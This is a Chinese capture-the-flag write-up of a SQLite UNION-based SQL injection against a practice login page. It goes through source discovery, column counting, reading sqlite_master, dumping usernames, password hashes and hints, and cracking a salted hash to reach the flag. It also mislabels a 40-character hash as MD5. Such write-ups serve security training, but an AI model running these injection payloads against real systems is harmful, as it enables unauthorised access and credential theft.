过程:
还是先喜欢看robots.txt文件
编辑
/admin.php界面
编辑
/login.php界面
编辑
Ctrl+U打开源码
发现了?debug
编辑
发现了新源码
编辑
开始进行代码审计
发现数据库为SQLite3(与MySQL有一点区别,sqlite_master表中存着相关信息)
type/name/tbl_name/rootpage/sql记录着用户创建表时的相关信息
且注释符为--
编辑
还发现输入的usr存在注入
没有任何过滤,能够拼接进数据库中执行
编辑
使用bp拦截,并进行注入
(在bp中注入)
编辑
判断字段数
1' order by 3 --
(报错)
编辑
1' order by 2 --
(回显正常)
编辑
所以字段数为2
判断回显
1' union select 1,2 --
回显位为第二位
编辑
查sql表中字段
编辑
CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29
解码后编辑
CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))
字段有:id name password hint
构造查询name
payload:
1' union select id, name from Users--
编辑
admin
构造查询password
payload:
1' union select id, password from Users--
编辑
3fab54a50e770d830c0416df817567662a9dc85c
构造查询hint
payload:
1' union select id, hint from Users--
编辑
my+fav+word+in+my+fav+paper%3F%21
解码后
my+fav+word+in+my+fav+paper?!
我们就得到了表中第一个数据
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c(MD5是消息摘要加密,可能会解不出来)
hint=my+fav+word+in+my+fav+paper?!(说的就是在他的论文里面)
编辑
编辑
解密出来了为
ThinJerboaSalz!
那个词为Salz
ThinJerboaSalz!减去Salz
所以密码为ThinJerboa
在/admin.php页面进行登录
编辑
编辑
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}